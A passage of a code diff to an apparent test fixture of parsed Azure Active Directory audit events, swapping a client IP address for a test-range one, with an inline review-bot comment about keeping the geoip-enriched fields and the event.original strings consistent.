e\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -3359,9 +3359,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
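Review bot: The parsed `ActorIpAddress`/`ClientIP` values change here, but nothing in this hunk covers the enrichment those fields normally feed: if the pipeline copies `ClientIP` into `client.ip`/`source.ip` and runs a geoip processor, the new address should now resolve against the bundled test database, and the resulting expected `*.geo.*` (and possibly `*.as.*`) fields belong in this fixture as well — they are outside the hunk, so this needs confirming against regenerated output. Replacing 83.57.233.151, which looks like a real end-user address, with one from the supported test range is the right call for a committed fixture. If these lines were hand-edited, consider regenerating the expected file with the test harness instead, so the `event.original` string and every derived field stay consistent.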
@@ -3595,7 +3595,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -3625,9 +3625,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -3861,7 +3861,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f